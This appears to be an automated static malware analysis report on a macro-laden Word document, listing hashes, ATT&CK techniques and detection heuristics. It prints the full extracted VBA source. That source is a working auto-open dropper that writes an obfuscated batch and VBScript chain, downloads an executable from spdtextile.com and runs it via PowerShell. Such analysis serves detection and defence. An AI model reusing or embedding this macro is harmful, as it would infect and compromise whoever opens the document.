Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8ea9d77f19671651…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 66.7 KB
Created: 2020-05-04 15:16:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-09-07
MD5: 8026efe45fa552f96cdbd22e547b8424
SHA-1: 50dcc6c69918eacd5f9642e34b7a422287863e16
SHA-256: 8ea9d77f1967165177a58e6dd9c397ffad8a3e9dcdf9bb4408db501b9067a7ad
Risk Score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is a malicious OOXML document containing VBA macros. The macros are obfuscated and contain a call to Shell, which is used to download and execute a second-stage payload from a remote URL. The presence of the AutoOpen macro and the critical heuristic firings indicate a clear intent to execute malicious code upon opening the document.

Heuristics (9)

  • VBA project inside OOXML (medium; rule OOXML_VBA; 6 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (critical; rule OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
    '--------------Shell API and Constants----------
  • Obfuscated VBA Shell command with URL (critical; rule OLE_VBA_OBFUSCATED_SHELL_URL)
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script:
    '--------------Shell API and Constants----------
  • VBA downloads and writes a file to disk (critical; rule OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        stringToWrite = stringToWrite & "echo b.Write NeHD.ResponseBody >> %NKFDGIDIFNSNF%" & vbNewLine
  • CreateObject call (high; rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
        stringToWrite = stringToWrite & "echo Set NeHD = CreateObject(""MSXML2.Se" + "rverXMLHTTP"") >> %NKFDGIDIFNSNF%" & vbNewLine
  • VBA p-code auto-exec with execution tokens (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low; rule OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub autoopen()
  • Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://spdtextile.com/sclas/rockstar.php (referenced by macro)
    • http://s@pdtext (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13054 bytes
SHA-256: a5d624ee52de4df1fe3bd85bd1ea2519ef2a33abe2f9e81252b55b5dbe011fea
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Public Const GENERIC_WRITE = &H40000000
Public Const OPEN_ALWAYS = 4
Public Const FILE_ATTRIBUTE_NORMAL = &H80

#If VBA7 Then
Public Declare PtrSafe Function WriteFile Lib "kernel32  " (ByVal hFile As LongPtr, lpBuffer As Any, ByVal nNumberOfBytesToWrite As LongPtr, lpNumberOfBytesWritten As LongPtr, ByVal lpOverlapped As LongPtr) As LongPtr
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "IMAGEHLP.DLL  " (ByVal DirPath As String) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32  " (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateFile Lib "kernel32  " Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
#Else
Public Declare Function WriteFile Lib "kernel32                " ( _
                    ByVal hFile As Long, _
                    lpBuffer As Any, _
                    ByVal nNumberOfBytesToWrite As Long, _
                    lpNumberOfBytesWritten As Long, _
                    ByVal lpOverlapped As Long) As Long
Public Declare Function MakeSureDirectoryPathExists Lib "IMAGEHLP.DLL    " (ByVal DirPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32   " (ByVal hObject As Long) As Long
Public Declare Function CreateFile Lib "kernel32          " Alias "CreateFileA" ( _
                    ByVal lpFileName As String, _
                    ByVal dwDesiredAccess As Long, _
                    ByVal dwShareMode As Long, _
                    ByVal lpSecurityAttributes As Long, _
                    ByVal dwCreationDisposition As Long, _
                    ByVal dwFlagsAndAttributes As Long, _
                    ByVal hTemplateFile As Long) As Long
                    
#End If

Public Sub App_Hard_Wait_DoEvents(dblSeconds As Double)
      
      If dblSeconds = 0 Then Exit Sub
      Dim varStart As Variant
      varStart = Timer
      
      Do While Timer < (varStart + dblSeconds)
          
      DoEvents
      Loop
      
      With Application
        .ScreenUpdating = False
         
        Do Until .Documents.Count = 0
             
            .Documents(1).Close SaveChanges:=wdDoNotSaveChanges
        Loop
        
        .Quit SaveChanges:=wdDoNotSaveChanges
    End With
    
End Sub
Sub Gippo()
'
' Samsung, Xiaomi, Meizu, Huawei, OnePlus
'
MakeFolder "c:\\\\pipedir\\\\\"

End Sub

Sub autoopen()

Gippo

End Sub

Public Function MakeFolder(ByVal pathToCreate As String) _
  As Boolean
    Dim sSomePath As String
    Dim bAns As Boolean
    
   sSomePath = pathToCreate
   
    If CreatePath(sSomePath) = True Then
        bAns = True
    Else
       bAns = False
    End If
MakeFolder = bAns
End Function

Private Function CreatePath(NewPath) As Boolean
    Dim sPath As String
    sPath = NewPath & IIf(Right$(NewPath, 1) = "\", "", "\")

    If MakeSureDirectoryPathExists(sPath) <> 0 Then
    
    Dim hExportFile, nWritten
    Dim stringToWrite As String

      hExportFile = CreateFile("c:\pipedir\obsrecord.cmd" _
        , GENERIC_WRITE _
        , 0 _
        , 0 _
        , OPEN_ALWAYS _
        , FILE_ATTRIBUTE_NORMAL _
        , 0 _
    )
    
    stringToWrite = "996475373574397836369488 "
    stringToWrite = stringToWrite & "967326252783299636687299 " & vbNewLine
    stringToWrite = stringToWrite & "874698283733548974368557 " & vbNewLine
    stringToWrite = stringToWrite & "554262726737546352757534 " & vbNewLine
    stringToWrite = stringToWrite & "575262664446338253559277 " & vbNewLine
    stringToWrite = stringToWrite & "965338544338926323537288 " & vbNewLine
    stringToWrite = stringToWrite & "669589462824989464437893 " & vbNewLine
    stringToWrite = stringToWrite & "662962837427864373745275 " & vbNewLine
    stringToWrite = stringToWrite & "773596225649356249344697 " & vbNewLine
    stringToWrite = stringToWrite & "689245556469872577332328 " & vbNewLine
    stringToWrite = stringToWrite & "759687397722384735626647 " & vbNewLine
    stringToWrite = stringToWrite & "948384293337326873383362 " & vbNewLine
    stringToWrite = stringToWrite & "485995586497356493464752 " & vbNewLine
    stringToWrite = stringToWrite & "373924958259247666889987 " & vbNewLine
    stringToWrite = stringToWrite & "576976573339836257556976 " & vbNewLine
    stringToWrite = stringToWrite & "336787352493483565245244 " & vbNewLine
    stringToWrite = stringToWrite & "593828986835668277968499 " & vbNewLine
    stringToWrite = stringToWrite & "926736974438894894498559 " & vbNewLine
    stringToWrite = stringToWrite & "625645797574579675277663 " & vbNewLine
    stringToWrite = stringToWrite & "542388524925683893892548 " & vbNewLine
    stringToWrite = stringToWrite & "392542357772797757959633 " & vbNewLine
    stringToWrite = stringToWrite & "638938684752932487476246 " & vbNewLine
    stringToWrite = stringToWrite & "767834296898856888293435 " & vbNewLine
    stringToWrite = stringToWrite & "748698568445437932752954 " & vbNewLine
    stringToWrite = stringToWrite & "892537353278935364467923 " & vbNewLine
    stringToWrite = stringToWrite & "646425884257596934988939 " & vbNewLine
    stringToWrite = stringToWrite & "785239849727987285423977 " & vbNewLine
    stringToWrite = stringToWrite & "846989324686659657734259 " & vbNewLine
    stringToWrite = stringToWrite & "S^" & vbNewLine
    stringToWrite = stringToWrite & "et NKFDGIDIFNSNF=c:\pipedir\NKFDGIDIFNSNF.vbs" & vbNewLine
    stringToWrite = stringToWrite & "echo Dim MathCtrl, NeHD, a, b, c, daycolor, march >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set MathCtrl = Wscript.Arguments >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set NeHD = CreateObject(""MSXML2.Se" + "rverXMLHTTP"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo c = MathCtrl(0 + 0) >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo daycolor = MathCtrl(1 + 0) >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo NeHD.Open ""GET"", c, 0 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo NeHD.Send >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set b = CreateObject(""ADODB.Stream"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Open >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Type = 1 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo march = NeHD.Status >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "646565872973647726523532 " & vbNewLine
    stringToWrite = stringToWrite & "652289283432553977439546 " & vbNewLine
    stringToWrite = stringToWrite & "745466658778242843276366 " & vbNewLine
    stringToWrite = stringToWrite & "533843839786645529478696 " & vbNewLine
    stringToWrite = stringToWrite & "666736977692874993846726 " & vbNewLine
    stringToWrite = stringToWrite & "875262765338332724829626 " & vbNewLine
    stringToWrite = stringToWrite & "534356348752823732353367 " & vbNewLine
    stringToWrite = stringToWrite & "792249439929954693226582 " & vbNewLine
    stringToWrite = stringToWrite & "525989983554425664927932 " & vbNewLine
    stringToWrite = stringToWrite & "853852465627956876499278 " & vbNewLine
    stringToWrite = stringToWrite & "echo If march ^<^> 200 Then >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo    WScript.Quit 1 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo End If >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Write NeHD.ResponseBody >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Position = 0 + 0 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set a = CreateObject(""Scripting.FileSystemObject"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo If a.FileExists(daycolor) Then a.DeleteFile daycolor >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.SaveToFile daycolor >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Close >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "cscri^" & vbNewLine
    stringToWrite = stringToWrite & "pt c:\pipedir\NKFDGIDIFNSNF.vbs http://spdtextile.com/sclas/rockstar.php c:\pipedir\LODFOJKFG.exe" & vbNewLine
    stringToWrite = stringToWrite & "powersh^" & vbNewLine
    stringToWrite = stringToWrite & "ell -c Sleep -s 8;Saps 'c:\pipedir\LODFOJKFG.exe'" & vbNewLine
    stringToWrite = stringToWrite & "break>c:\pipedir\NKFDGIDIFNSNF.vbs" & vbNewLine

    
    WriteFile hExportFile, ByVal stringToWrite, Len(stringToWrite), nWritten, 0

    CloseHandle hExportFile

    CreatePath = True

    End If

    ShellAndWaitReady "c:\pipedir\obsrecord.cmd", 0
    
    App_Hard_Wait_DoEvents (13)
    
End Function


Attribute VB_Name = "Module1"
Option Explicit

'--------------Shell API and Constants----------
Private Const WAIT_FAILED = -1&
Private Const INFINITE = &HFFFFFFFF       '  Infinite timeout
Private Const NORMAL_PRIORITY_CLASS = &H20
Private Const SYNCHRONIZE = &H100000

#If VBA7 Then
Private Declare PtrSafe Function WaitForInputIdle Lib "user32" (ByVal hProcess As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr
#Else
Private Declare Function WaitForInputIdle Lib "user32" (ByVal hProcess As Long, ByVal dwMilliseconds As Long) As Long
#End If
'Purpose   :    Shells a process synchronised i.e. Holds execution until application has closed.
'Inputs    :    sCommandLine        =   The Command line to run the application e.g. "Notepad.exe"
'               State               =   The Window State to run of the shelled program (A Long)
'Outputs   :    Returns the Process Handle
'Notes     :    Have noticed side effects. Other applications like Internet Explorer seem to be effected by this.

Public Function ShellAndWaitReady(sCommandLine As String, Optional lState As Long = vbNormalFocus) As Long
    Dim lhProc As Long
    
    If Left$(sCommandLine, 1) <> Chr(34) Then
        sCommandLine = Chr(34) & sCommandLine
    End If
    If Right$(sCommandLine, 1) <> Chr(34) Then
        sCommandLine = sCommandLine & Chr(34)
    End If
    lhProc = Shell(sCommandLine, lState)
    'Wait for the process to initialize
    Call WaitForInputIdle(lhProc, INFINITE)
    'Return the handle
    ShellAndWaitReady = lhProc
End Function

'Purpose   :    Holds execution until application has closed.
'Inputs    :    sFilePath       =   The path to the application to run e.g. "Notepad.exe"
'               [sCommandLine]  =   Any command line arguments
'               [lState]        =   The Window State to run of the shelled program (A Long)
'               [lMaxTimeOut]   =   The maximum amount of time to wait for the process to finish (in secs).
'                                   -1 = infinate
'Outputs   :    Returns the True if failed open a process or complete within the specified timeout.
'Notes     :    Similiar to ShellAndHold, but will not get any 'spiking' effects using this method.



'Purpose     :  Checks if a file exists
'Inputs      :  sFilePathName                   The path and file name e.g. "C:\Autoexec.bat"
'Outputs     :  Returns True if the file exists


Function FileExists(sFilePathName As String) As Boolean
    
    On Error GoTo ErrFailed
    If Len(sFilePathName) Then
        If (GetAttr(sFilePathName) And vbDirectory) < 1 Then
            'File Exists
            FileExists = True
        End If
    End If
    Exit Function
    
ErrFailed:
    'File Exists
    FileExists = False
    On Error GoTo 0
End Function



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CB91606B-A906-422C-B200-40A6DF4AD3C3}{64034459-9996-423A-999E-4FFD420B03FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4C92A3E7-215B-4C42-A660-1E14176D303A}{60F6922A-0C4C-4737-AC0F-E4F87CB93B10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 2342912 bytes
SHA-256: 2278c6888c9e9f84d4605752026560f81cdd366f7d98e289428e310b9e901d73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 684 long base64-like blob(s).